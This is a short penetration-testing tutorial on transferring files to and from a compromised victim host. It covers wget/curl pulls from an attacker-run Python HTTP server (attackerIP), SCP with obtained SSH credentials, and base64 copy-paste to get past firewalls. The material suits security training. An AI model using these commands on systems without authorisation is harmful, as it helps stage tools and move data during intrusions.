Transferring files to/from remote victim

Once we have compromised a system, we can use different methods to transfer files to or from the victim, depending on the situation.

Using wget or cURL

If the compromised victim has enough privileges to download files, we can use wget or curl to copy a file from our own machine. First go into the directory that contains the file you want to transfer and start a simple Python HTTP server there with:

cd /transferDirectory
python3 -m http.server 8080         #8080 as an example port, use whatever

Now that the server is listening on port 8080 on our machine, download the file on the victim (where we already have code execution) with:

wget http://attackerIP:8080/file
or
curl http://attackerIP:8080/file -o newNameFile

It also works the other way around: run the HTTP server on the victim (if it has Python installed) and download from the attacking machine via wget/curl.


Using SSH file transfer SCP

If we have obtained SSH credentials, we can use SCP to transfer files from our attacking machine to the victim directly:

scp /local/dir/fileX user@IP:/remote/dir/fileX

Using Base64

If you are not able to transfer files directly, for example because a firewall prevents the victim from downloading files, you can use the base64 trick. It consists of encoding the file in base64 without line breaks (-w 0), so that every byte of the file survives a copy and paste:

base64 fileX -w 0 

And paste the result on the compromised machine with:

echo d2hhdCBhcmUgeW9 ... 1IGxvb2tpbmcgYXQg | base64 -d > fileX

To validate that the file was transferred correctly, compute the MD5 hash of the original file and of the file pasted on the victim system, and compare the two:

md5sum fileX
